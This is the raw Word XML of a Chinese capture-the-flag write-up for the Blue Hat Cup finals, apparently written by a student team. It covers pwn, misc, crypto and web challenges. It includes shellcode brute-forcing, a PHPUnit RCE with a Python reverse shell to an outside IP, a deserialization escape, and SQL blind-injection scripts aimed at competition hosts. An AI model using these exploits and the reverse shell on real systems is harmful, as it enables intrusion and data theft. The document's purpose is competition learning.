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7"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>00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rFonts w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:color w:val="FF2941"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>成绩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hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:color w:val="FF2941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恭喜EDI安全团队师傅在第四届“蓝帽杯”全国大学生网络安全技能大赛决赛中荣获一等奖和二等奖。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7"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>01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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>pwn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5276850" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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沙箱保护的题目 Seccomp 沙箱 ，没有 write 写函数 但是 open 后面的 read，运用 cmp 进行比较 vmmap 在 0x10000，可以放"/home/pwn/flag" 构造 shellcode 进行爆破（与之前打过的天翼杯的题目类似）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5276850" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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EXP脚本：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CA7D37"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>from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pwn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import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*elf=ELF(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'./chall'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)EXCV = context.binary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'./chall'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#libc=('')#context.log_level = 'debug' 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def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pwn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(p, idx, c):    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 open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    shellcode =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"push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"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     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 re open, rax =&gt; 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    shellcode +=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"push 2; pop rax; syscall;"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     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 read(rax, 0x10040, 0x50)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    shellcode +=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"mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"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 cmp and jz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idx ==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:        shellcode +=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"cmp byte ptr[rsi+{0}], {1}; jz $-3; ret"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.format(idx, c)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        shellcode +=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"cmp byte ptr[rsi+{0}], {1}; jz $-4; ret"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.format(idx, c)   shellcode = asm(shellcode)    p.sendafter(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"xecution-box.\n"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 shellcode.ljust(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0x40-14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b'a'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 +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b'/home/pwn/flag'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)idx =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var_list = []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while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):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c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range(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32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127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):        p = remote(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"8.131.246.36"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40334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 xml:space="preserve">#nc 8.131.246.36 40334   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    pwn(p, idx, c)        start = time.time()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try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            p.recv(timeout=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except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:    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pass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    end = time.time()        p.close()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end-start &gt;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1.5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            var_list.append(c)            print(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.join([chr(i)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var_list]))    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break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        print(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.join([chr(i)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var_list]))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break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    idx = idx + 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print(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.join([chr(i)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var_list]))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t>flag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5276850" cy="3552825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1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7"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>02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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>misc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Style w:val="7"/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2"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>签到题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转assii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Style w:val="7"/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2"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>隐写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通过 binwalk 解出文件夹和 pdf 将得到 pdf 用 wb4stego 进行解密 pdf 得到东西没解出来 flag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6343650" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10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爆破得到压缩包密码 rmrf 通过 keyword 加密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7391400" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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334250" cy="1876425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8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Style w:val="7"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>QAQ_pcap</w:t>
      </w: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在65流里找到了TLS的log，可以对TLS流量进行解密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287000" cy="5791200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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解密后可以提取出一个rar文件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解压得到so_easy.pcap,文件头被改了，改回来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467475" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="5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对流量包进行分析，发现是多个usb设备的流量，将每个单独过滤保存。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287000" cy="5791200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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单独分析，有一个鼠标流量，一个键盘流量，鼠标画出来啥都不是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流量键盘用脚本进行解析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mappings = {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"A"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0x05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"B"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"C"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"D"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0x08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"E"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0x09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"F"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0x0A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"G"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0x0B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"H"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"I"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0x0D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"J"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"K"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0x0F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"L"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"M"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"N"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"O"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0x13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"P"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"Q"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0x15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"R"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"S"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"T"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0x18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"U"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0x19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"V"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0x1A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"W"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0x1B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"X"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"Y"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0x1D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"Z"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"1"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0x1F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"2"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"3"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"4"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"5"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0x23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"6"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"7"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0x25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"8"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"9"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"0"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0x28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"\n"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0x2a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"[DEL]"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  0X2B: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    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 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0x2D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"-"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"="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0x2F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"]"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"\\"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"~"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0x33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";"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"'"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","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0x37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"."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225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"[LeftShift]"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229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"[RightShift]"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0x50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"[LeftArrow1]"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}nums = []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keys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=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open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'key.txt'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line in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keys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(len(line)) !=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continueprint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(line[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])nums.append(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(line[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4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16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))keys.close()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print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(nums)output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n in nums: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n ==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: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continueif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n in mappings:output += mappings[n]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:output +=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"["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+str(n)+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"]"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print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'output :\n'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+ output)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注意有LeftArrow1和shfit,都解释出来后就得到flag了flag:Hi!This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y flag!The flag[]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flag{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Pc@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p_1s_5o_3asY!}Bye!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7"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>03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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>CRYPTO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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>common_modulus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:spacing w:val="15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>先用共模，算出HINT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import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gmpy2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import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binascii as B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n=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= 781036391323974008856551441504551844841173384369055361767143425092387727015642055181741701170017399241497120632344953499820518820132068694764700867696829033106666055030180813062993649803797649124562825632340854157269454042167398954816966758408050707394510052574354703514670567409229754892812751190528559839163370996270173354192391025119212070374345175232268160015709412770236244184407603397493657886160301984598114022346065772036916080039069065703045460825584095559014098364274915486192890077441915702648662247422573607141301387160468708901332801070000950051880674436952646199048944681743156311156561347137284309444428161898926050856612636204505753959646608899803680618195914959490447723147711810217755931778569656715879355497741337867486596084617334222360877256151925248867366886699774397369843538784086757551124956184373578870266105742924242667575610284091444010308038579594247922368368398449676635147254244680714381600463229849534333608407292776731721661271718860696451810720187133868564530559847589151122364073467586981976649022363672800597675920485113168688814933825793827901051904388778126030212255351752567066602576348655685594872269975311829268026394327948942096118152848379484736487085060738082253125862183108996724624059293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c1=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= 369574840235539108372094092254419274246554984982221252273253594183836400022960378170488757871945636102709146100003103420983393418895920944769809509498534206740321414394214836818668536994868508542980403916810808297197199669370712797146359430162012897117686984913530312098913792383741034334686281360853026726954824577914039860820382688425141138202072956110821496285690037742234810972548140439615644523558778763893381916419169521655893103187028705326557465586164413430726626576639348603638806511311706975958593200898505048876740706947195874397909272772688774998312506679360257618176951770041342256209410863260884750487279961933541672586237719402972217492287549068766414410155714303648473676009661943965293501994978200745219593293552499364219563185093112256120550663818918964081980469288619926291250638450874316053326601032273087039376723415701554676257043515877013761681843885375325430297941942692679848107999743068109805325264735576658206199089491608087442001508062053843516431089207243339447049547611183815785864081653492970812961076181422434762137310522146572918571492263273382927468586853431581811297567337244729976259333642991615934568219783998183005087012034016783535060297367475598352120058322912068079704771685886066199702963018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c2=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= 40100374814951000281876736923025460251386515966133990680034729071169080727070230123062402542283131159663279514153172043500285373857316318231245312768625975677906848252925790010396755077906744599006790273304877441479063651958726512299294623093792535996709117250490140733468752080375521456492915774881722260886750498464043531723794098972871598060659633230993808358316243250637397683919810588986071672817520762867690358134480794475569584815119062349875301029432361733827006004042374201014525912967826466246535587934173012052603222994448238836025821642468269440426349895694713058005683959284096219160489363264558550557751764781795244851035326762954924677680965702196370730974008407273142986052280114002137507814045452347310822952245652943803696370229640610146285617703742700876552230262512843493168097391123944395240996661678809521778255215317077213780728759489768185504523781473653680020543858901066854564797293517241908231457219660665670362841815995243641922306056588825399148137030742654246800178382925933203553441447098878818338352864203897981189906118291642279590246578844378518446164080007464273624861338646759676564769676476650979319431845899427934619173241546322612967621048815830321682628737474413297725801806470954127959121980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e1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321959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e2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250261</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="AFAFAF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>s0,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s1, s2 = gmpy2.gcdext(e1, e2)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if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s1 &lt; 0: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s1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-s1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c1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gmpy2.invert(c1, n)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elif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s2 &lt; 0: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s2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-s2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c2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gmpy2.invert(c2, n)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m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gmpy2.powmod(c1, s1, n)*gmpy2.powmod(c2, s2, n) % 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m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gmpy2.iroot(m,11)[0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="AFAFAF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>print('[-]m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is:', m)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print(hex(m))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="AFAFAF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>print(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B.a2b_hex(hex(m)[2:]))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287000" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4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import gmpy2from Crypto.Util.number import *hint = 0x65333d3338363332312c65343d323136343337n2= = 829153922415855137264800234822397159517330834702889033537933377293887344320377111020468975059392957737449202237724182178497515850669969287557171761512943313347002707881627665997773538338624697031113180118787578098839812766590356161880633390491240275263405375614880514319024910802488825931065452764114707860207310201420715597319258880485040522551832971592910421789656655281398336391483665797851843030704262677198876702546809063670714197016598069553974073602743894202215033991282795559558580509644985355582265309273819085165244990507821708921430055578522701525123887916901778357465509369586730929688392667732886906857430517653096398002777964560127268121571049233223372798710275104635615146227690965482270801899538594859206469480776522613028131598888508457709453379574742196454867003503347438618445660900423827776062276496733498823286497376761412579384984369308185260156963156405659950843672893896087650002269874800953868406307954077672988900057904666430054296760155287271561170025767624003816826720442668295925485637633877652749338842612472516105683964067019360513619412986301224461318521372012905629559424109846511589009550745828509068711532135188012958609344134355466641890243263881890822508445307982892951553198862583429368670057993c3= = 159724515943626607063077852180725785535830882720862727668525327462548399711146109134244815376287134761817075519820142556357574606798840233562248755971526219627762223734393473798914901143269449212790392600105330383090174083139586064181174009077350924651070244802047181675971743583126005374180803661344948105563731243622231745397860438110568700027808240466520775159603948893458839584686022713865445974999010633338992077036339635470928309825709158252021736998333181626196852117911063143924690274341118934263954401171980866857766803251097624531349328131906037324939822709718110584612723905396082816423636920021116198893529151233844741049768382997165306708386377461537659894631638669541135139772256724755879894163220385702448163577861050255922091076291360733371557008202704744025308442559929057280944151904346146363641694256384699833066941693911888313063101709464779564216471784300409758667075242519216711038178970244130709075948085377075896223268673956328949049096893114349123857314470200317354442002350914580896785644057370606138149403529271049952702755513806243257608741081761103014849775297798769123025294190124352059867893341310583345698551198662911063194743695473937982189580136904500546179872911907699655901666991491654421172959264c4= = 577539997913679548128771306860581210544436789252901226997329423745523775309125445697836728285902404228772238261978792894724035857571722732772392975266650638941506233731097966088599219553016910895407298319171601788682316820727521975802034842881641332176636880671926669677709251368489592049188264858974171362799051918792714121517422464840766220636795897542591062529334135365684855298036787805819982776703613397951208027499626161971540340384357517350954755917853981444696889490414620688922414306470663625107920255478295871212500731262906706677230231273773081082937699900897018507666959617262265778895830665231960626623936539619558323350031200046331865204833002387826480300556398975518044660453862186191885052104669182124205562629260585502282489936369132703221625792917684714281278526690498041768698231671538540231217204457920089132127615505206718241082416584911313565380784068494321438301994932115301961956898936006101799945175006847294491423172988371831199816110394796146842726192613950900507852084712888550397657990358471172662866403096061418272111461743199683739447289005311734544421847876133462236161463005728810728422873087670552019575195179400831748068699257581271088746550021722434317091260496556373742562805426688588980981788900c =795129169552291006861754002206513820937641980698434382418936261423422746999612445764303059674219208389574024534672717069821412414159146551366545996353949783196010213553918927580779995019174186191032145333149188913037471190229239099846321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485033232436935611571367541493044277081533408993875257311753734536147571167095896669077719414131452331046090464837590749820091009158875152457888900355791540044943189887475311977641143538035689663891597983971260327156044023687896426055728061855343985242964248584312808777178962375936043822201018415653235814485615205327407400780005852561278683155208683364942051067379779866515199199129202240010485952950728372189222715041921342651574061028219342292107006496306690996248232154011982638406599183117999624463176008864712361084026607499225962202418264921259296412132569498420948156231991422121967643470934361208982842203404876002586976855763264989245461870293707215153833855463524713435447265274151395156396029507394842810440848947409747692940663271981830686236597905086310965497295634452454502792579750856566644956428398186959955662345052899355866818276388556869309837579415317436154415391396745002015389421807844666877314560257175276506064197678141334956984552068148598923249237123558477833149102400e3=386321e4=216437s0, s1, s2 = gmpy2.gcdext(e3, e4)if s1&lt;0:s1 = - s1c3 = gmpy2.invert(c3, n2)elif s2&lt;0:s2 = - s2c4 = gmpy2.invert(c4, n2)c = pow(c3,s1,n2)*pow(c4,s2,n2) % n2a = gmpy2.invert(hint**13,n2)d = (c*a)%n2flag = gmpy2.iroot(d,13)[0]print long_to_bytes(flag)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287000" cy="5029200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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7"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>04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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>web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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>php</w:t>
      </w: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打开题目，f12 发现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9791700" cy="7772400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18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发现是 php 单元测试框架 phpunit 漏洞 参考连接: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https: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//github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.com/ybdt/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exp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-hub/tree/master/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2020_11_13_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PHPUnit%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-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2017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9841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%EF%BC%89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可以执行命令但是貌似发现有 diable_functions 可以用 readfile 读取 php.ini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5219700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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禁用函数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714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1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发现没有过滤 pcntl_exec 所以利用 pcntl_exec 绕过，并利用 python 反弹 shell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&lt;?php pcntl_exec(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"/usr/bin/python"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,array('-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', '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import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socket,subprocess,os;s=socket.socket(socket.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AF_INET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,socket.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SOCK_STREAM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,socket.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SOL_TCP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);s.connect((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"47.242.11.183"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9898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));os.dup2(s.fileno(),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);os.dup2(s.fileno(),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);os.dup2(s.fileno(),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2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);p=subprocess.call([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"/bin/bash"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"-i"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]);'));?&gt;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1123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16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弹回来发现不能直接读 flag,权限不够。先查看内核(版本太高)，再看下 suid 和 sudo 也不存在 所以看下利用其他用户权限出发。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5181600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14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发现有 admin 用户，尝试寻找有关信息，没有特殊进程。然后在 web 根目录找到数据库 root 密码。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2905125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15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5"/>
          <w:szCs w:val="25"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>尝试利用此密码登录 admin 用户 先用 python 交互 shell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1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="23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5"/>
          <w:szCs w:val="25"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>登录成功，直接 cat /flag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1447800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24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Style w:val="7"/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Login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扫描出www.zip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6296025" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="22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AFAFAF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>&lt;?php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error_reporting(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class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File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public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$user;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public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$pass;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public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$repass;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public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$dir;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function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__construct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($data1, $data2, $data3, $data4){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-&gt;user = $data1;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-&gt;pass = $data2;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-&gt;repass = $data3;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-&gt;dir = $data4;}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function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Login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(){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((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-&gt;user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'ohhhh'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&amp;&amp;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-&gt;pass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'a3333'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 || ($this-&gt;user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'admin'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&amp;&amp;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-&gt;pass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'admin888'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))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return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true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;}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return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false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;}}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function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__destruct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(){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-&gt;Login()) {readfile(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$this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-&gt;dir);}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die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'wrong user or pass'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);}}}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function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filter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($data){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($_SERVER[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'REMOTE_ADDR'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]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'127.0.0.1'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return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$data;}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{$filter_arr =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array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'admin'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'test'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'root'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);$filter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'/'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.implode(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'|'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,$filter_arr).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'/i'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;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return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preg_replace($filter,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'hacker'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,$data);}}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isset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'user'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]) &amp;&amp;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isset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'pass'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]) &amp;&amp;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isset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'repass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']) &amp;&amp;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isset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'dir'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])) {$user = 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'user'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];$pass = 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'pass'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];$repass = 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'repass'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];$dir = $_GET[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'dir'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];$get = filter(serialize($_GET));}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else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{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die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'hello world'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);}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反序列逃逸 膜改题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参考链接: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https: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//blog.csdn.net/slc3315/article/details/107868905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15"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这里用户名密码可以是 2 个如果是 ohhhh 就不用算长度了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EXP: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import requestsfor i in range(200):exp = 'admin' * iurl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"""http://eci-2zegmubwrc7i5lg2367d.cloudeci1.ichunqiu.com/ind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ex.php?user=ohhhh&amp;pass=a3333&amp;repass=%s";s:3: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"dir"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;s:5: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"/flag"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;}&amp;dir=1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"""%(payload)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res = requests.get(url)if "flag{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 in res.text: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print(url)print(res.text)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6848475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1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7"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Login2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打开题目发现是 sql 注入，过滤了很多，关键是过滤了单引号双引号，所以这里用可以用反 斜杠闭合,过滤空格，用/**/绕过。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5448300" cy="1209675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19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10287000" cy="6867525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20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发现语句执行成功 题目说只有 admin 能登陆 所以注 admin 的密码 但是发现基本查询语句基本过滤，所以这里用正则盲注，利用 regexp binary 匹配 数据库中没有找到 flag。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import requestsurl = ''post = {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"username"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"\\"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"password"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"{}"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}a1 = '0x5e'a2 = '.?^*+$'result = ''for i in range(1,20):for i in range(32,127):if chr(i) in a2:pass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else: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a3 = str(hex(i)).replace('0x','')payload = '||/**/password/**/regexp/**/binary/**/{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="AFAFAF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>#'.format(a1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+a3)post['password'] = payloadres = requests.post(url,data=post)if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"flag"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in res.text:result = result+chr(i)print(result)a1 = a1+a3break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pacing w:val="15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>但是匹配到 admin 的 password 为:This1snOtthEr1ghtfLag 尝试登录获取 flag。login2脚本：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righ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import requestsimport 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string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def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str2hex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string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):  result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string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    result += hex(ord(i))  result = result.replace(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'0x'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  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return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 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'0x'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+resultstrs =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string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.ascii_letters+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string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.digitsurl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"http://eci-2zeg7c6lv4s6yqtok9lb.cloudeci1.ichunqiu.com/"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headers = {   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'User-Agent'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'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'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}payload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'or/**/password/**/regexp/**/binary/**/{}#'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__name__ ==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"__main__"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:    name =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i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range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1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,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="0E9CE5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>40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):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for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j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strs:            passwd = str2hex(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'^'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+name+j)            payloads = payload.format(passwd)            postdata={               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'username'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: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'admin\\'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,               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'password'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:payloads            }            r = requests.post(url,data=postdata,headers=headers)            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="AFAFAF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>#print(postdata)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          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if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"flag"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in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 xml:space="preserve"> r.text:                name += j                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print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(j,end=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>)                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="CA7D37"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>break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8"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="8743950" cy="5829300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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7"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>Tip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misc&amp;crypto附件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CDA0C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3CDA0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A40E86B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A40E86B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A8D923D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8D923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E0198671"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E01986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F936388B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F93638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17D9C447"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17D9C4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227DBEF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="227DBE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31FBDDD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31FBDD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4B86C023"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B86C02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5C61CAE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C61CAE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5E438D89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E438D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793A6090"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="793A609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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="4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M4ZDJmOTY4ZWU1NzZhOTU4ZGU3NDE2Yjg3ZTdkYWEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0FA23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Office_11.1.0.12978_F1E327BC-269C-435d-A152-05C5408002CA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2022-12-03T04:47:01Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>企鹅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-03T04:47:29Z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2052-11.1.0.12978</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>89EF8397284F45D9AB723362EBD51F22</vt:lpwstr>
  </property>
</Properties>
</file>